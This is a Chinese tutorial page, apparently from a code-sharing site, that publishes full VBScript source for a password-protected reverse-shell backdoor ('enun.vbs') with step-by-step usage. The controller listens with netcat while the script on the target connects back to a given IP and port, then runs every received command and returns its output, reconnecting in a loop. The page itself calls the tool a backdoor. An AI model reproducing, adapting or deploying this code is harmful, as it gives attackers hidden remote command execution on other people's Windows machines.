VBScript 打造自己的远程CMDShell附使用教程

请先下载 mswinsck.ocx 与 VB6Controls.reg!

使用方法:

1,控制:nc.exe,执行:nc -l -v -p 1234;

2,目标:cscript.exe enun.vbs IP Port;

3,密码:enun。

几点说明:
1,退出 SHELL,请输入 “exit”,不要用 “Ctrl + C”,这样的话只能等目标重启或手动运行后门才能连接;
2,Windows 7 等环境下普通标准用户也能使用,但是获取的权限相对有限。
3,内部命令及管道使用如下图:

相关下载:
      1,视频演示
      2,vb6controls

enun.vbs 源码:

代码如下:

'--------------------------------------------------------------------------
' Copyright (c) lxzzr. All rights reserved.
' ScriptName: enun.vbs
' Creation Date: 28/8/2012
' Last Modified: 28/8/2012
' Author: lxzzr, www.enun.net
' E-mail: lxzzr@21cn.com
' Usage: Cscript.exe //nologo enun.vbs IP Port
'--------------------------------------------------------------------------
On Error Resume Next
Public SocketObj, ExecObj, ShellObj
RemoteHost = Wscript.Arguments(0)
RemotePort = Wscript.Arguments(1)

Do
 Do While (SocketObj.State <> 7)
  WScript.Echo "Try Connect to " & RemoteHost & ":" & RemotePort & " ..."

Set SocketObj = WScript.CreateObject("MSWinsock.Winsock")
  SocketObj.Protocol = 0
  SocketObj.RemoteHost = RemoteHost
  SocketObj.RemotePort = RemotePort
  SocketObj.Connect

WScript.Sleep 3000
 Loop

WScript.Echo "Connected to server."
 SocketObj.SendData SocketObj.LocalHostName & " is Connected, Enter Password: "
 Do While (SocketObj.BytesReceived = 0)
  WScript.Sleep 10
 Loop

'密码验证
 SocketObj.GetData Authkey, vbString
 If Split(Authkey, chr(10), -1, 1)(0) = "enun" Then

Set ShellObj = CreateObject("WScript.Shell")
  sRevData = " "
  SocketObj.SendData "Logon Success, Welcome!" & chr(13) & chr(10)

'循环等待执行命令
  Do
   Set ExecObj = ShellObj.Exec(Split(sRevData, chr(10), -1, 1)(0))

SocketObj.SendData ExecObj.StdOut.ReadAll
   SocketObj.SendData ExecObj.StdErr.ReadAll

If sRevData <> "" Then
    SocketObj.SendData chr(10) & "[" & SocketObj.LocalHostName & "@" & "enun]#: "
   End If

If Left(sRevData, 4) = "exit" Then
    SocketObj.Close
    Exit Do
   End If

SocketObj.GetData sRevData, vbString
   WScript.Sleep 1000
  Loop
 Else
  LockoutBadCount = LockoutBadCount + 1
  SocketObj.SendData "Logon Failure: Unknown user name or bad password." & chr(13) & chr(10)
  WScript.Sleep 1000
 End If

'账户策略
 If (LockoutBadCount > 3) Then
  SocketObj.SendData "The User Account is locked!" & chr(13) & chr(10)
  WScript.Sleep 1000
  SocketObj.Close
  LockoutBadCount = 0
  WScript.Sleep 600*1000
 End If
Loop

(0)

相关推荐

  • VBScript 打造自己的远程CMDShell附使用教程

    VBScript 打造自己的远程CMDShell附使用教程

    请先下载 mswinsck.ocx 与 VB6Controls.reg! 使用方法: 1,控制:nc.exe,执行:nc -l -v -p 1234: 2,目标:cscript.exe enun.vbs IP Port: 3,密码:enun. 几点说明: 1,退出 SHELL,请输入 "exit",不要用 "Ctrl + C",这样的话只能等目标重启或手动运行后门才能连接: 2,Windows 7 等环境下普通标准用户也能使用,但是获取的权限相对有限. 3,内部命令

  • VMware Workstation Pro 16许可证密钥 附使用教程

    VMware Workstation Pro 16许可证密钥 附使用教程

    VMware Workstation是一款功能强大的桌面虚拟计算机软件,用户可以在虚拟机同时运行各种操作系统,进行开发.测试.演示和部署,而现在该软件已经更新到16版本了,性能得到了很大的改进,提高了文件传输速度,改善了虚拟机关闭时间,改进了虚拟NVMe存储性能.相信大家都知道大多数软件由于版权限制,用户只有通过付费购买才可以免费使用,此软件也不例外,需要进行购买许可证密钥才能免费的使用这款软件,不然就会有时间.功能的限制,而今天给大家带来的是VMware Workstation Pro 16许

  • iOS10最新实现远程通知的开发教程详解

    一.iOS推送通知简介 众所周知苹果的推送通知从iOS3开始出现, 每一年都会更新一些新的用法. 譬如iOS7出现的Silent remote notifications(远程静默推送), iOS8出现的Category(分类, 也可称之为快捷回复), iOS9出现的Text Input action(文本框快捷回复). 而在iOS10, 苹果可谓是大刀阔斧般的, 对远程通知和本地通知进行了大范围的更新. iOS10推出了全新的UserNotifications框架(iOS10之前从属于UIKi

  • CentOS7.2安装MySql5.7并开启远程连接授权的教程

    1.安装mysql5.7 CentOS 7之后的版本yum的默认源中使用MariaDB替代原先MySQL,因此安装方式较为以往有一些改变: 下载mysql的源 wget http://dev.mysql.com/get/mysql57-community-release-el7-7.noarch.rpm 安装yum库 yum localinstall -y mysql57-community-release-el7-7.noarch.rpm 安装MySQL yum install -y mysq

  • IDEA 2020.1.2 安装教程附破解教程详解

    1:IDEA安装教程 开始安装Idea,点击next 点击Browse选择好安装文件夹,点击next 根据电脑选择几位,我的电脑是64位选择64bit,Update PATH variable:是否将IDEA启动目录添加到环境变量中,即可以从cmd命令行中启动IDEA,根据需要勾选 点击Install即可,开始安装 安装完成 启动IDEA,选择不导入设置 设置IDEA的UI主题,个人喜欢Darcula主题 ,后期也可以在设置里自行修改,点击Next: Default plugins: IDEA支

  • 最新clion2020激活码附安装教程(亲测有效)

    CLion是JetBrains公司旗下发布的一款跨平台C/C++IDE开发工具. 使用CLion上最好要会手写CMake.要先安装编译器套件(一般安装MinGW就行). 对C++标准的支持:基本上Clion对标准的支持取决与工具链(tool chains),但也不完全,比如就算工具链支持c++14,Clion本身对C++14目前支持还是有一定缺陷的,但是工具链支持意味着你至少可以正常编译. Clion的自动补全无疑是最强大的特性之一,写代码流畅无比! 特性: 1.支持GCC.clang.MinG

  • Clion2020.2.x最新激活码破解版附安装教程(Mac Linux Windows)

    上篇文章给大家分享了CLion-2020.1版本的激活码及安装教程,感兴趣的朋友也可以参考下. 本人是一名C开发的程序员,用过很多IDE,但是都不好用,没有感觉,还是用着Clion顺手有效率,为此推荐给大家 Clion2020增加了很多新特性,修复了大量bug,大大提高了开发效率.不用说,谁用谁知道!但是,Clion不是免费的.所以最新破解版Clion2020.2.x教程,CLION 2020激活码,可以提供给我们的朋友用于破解Windows Mac Linux相关版本! 声明:CLION 20

  • PHP远程采集图片详细教程

    当我们需要采集网络上的某个网页内容时,如果目标网站上的图片做了防盗链的话,我们直接采集过来的图片在自己网站上是不可用的.那么我们使用程序将目标网站上的图片下载到我们网站服务器上,然后就可调用图片了. 本文将使用PHP实现采集远程图片功能.基本流程: 1.获取目标网站图片地址. 2.读取图片内容. 3.创建要保存图片的路径并命名图片名称. 4.写入图片内容. 5.完成. 我们通过写几个函数来实现这一过程. 函数make_dir()建立目录.判断要保存的图片文件目录是否存在,如果不存在则创建目录,并

  • 用PHPdig打造属于你自己的Google[图文教程]

    用PHPdig打造属于你自己的Google[图文教程]

    一.什么是PHPdig? PHPdig是国外非常流行的垂直搜索引擎产品(与其说是产品,不如说是一项区别于传统搜索引擎的搜索技术),采用PHP语言编写,利用了PHP程序运行的高效性,极大地提高了搜索反应速度,它可以像Google或者Baidu以及其它搜索引擎一样搜索互联网,搜索内容除了普通的网页外还包括txt, doc, xls, pdf等各式的文件,具有强大的内容搜索和文件解析功能.PHPdig同传统的搜索引擎一样,包含了以下三种最基本的技术: 1.Spider技术 2.网页结构化信息抽取技术或

  • ASP小偷(远程数据获取)程序入门教程

    这里所说的"小偷"指的是在asp中运用xml中的xmlhttp组件提供的强大功能,把远程网站上的数据(图片,网页及其他文件)抓取到本地,经过各种处理后显示到页面上或者存储进数据库的一类程序.你可以通过这种小偷程序,完成过去一些似乎完全不可能实现的任务,比如说把某个站的页面偷梁换柱后变成自己的页面,或者把某个站的一些数据(文章,图片)保存到本地数据库中加以利用."小偷"的优点有:无须维护网站,因为小偷程序中的数据来自其他网站,它将随着该网站的更新而更新:可以节省大量的

随机推荐